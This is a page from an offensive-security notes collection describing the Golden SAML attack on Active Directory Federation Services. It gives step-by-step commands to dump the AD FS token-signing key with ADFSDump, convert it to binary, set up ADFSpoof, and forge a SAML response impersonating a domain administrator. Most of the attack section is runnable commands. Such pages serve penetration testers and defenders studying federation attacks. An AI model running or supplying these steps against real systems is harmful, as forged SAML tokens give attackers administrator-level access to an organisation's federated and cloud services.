InternalAllTheThings/docs/active-directory/ad-adfs-federation-services.md

1.9 KiB

Active Directory - Federation Services

ADFS - Golden SAML

Requirements:

  • ADFS service account
  • The private key (PFX with the decryption password)

Exploitation:

  • Run mandiant/ADFSDump on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): \\.\pipe\MICROSOFT##WID\tsql\query
  • Convert PFX and Private Key to binary format
    # For the pfx
    echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
    # For the private key
    echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin 
    
  • Create the Golden SAML using mandiant/ADFSpoof, you might need to update the dependencies.
    mkdir ADFSpoofTools
    cd $_
    git clone https://github.com/dmb2168/cryptography.git
    git clone https://github.com/mandiant/ADFSpoof.git 
    virtualenv3 venvADFSSpoof
    source venvADFSSpoof/bin/activate
    pip install lxml
    pip install signxml
    pip uninstall -y cryptography
    cd cryptography
    pip install -e .
    cd ../ADFSpoof
    pip install -r requirements.txt
    python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls
    /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
    

Other interesting tools to exploit AD FS:

References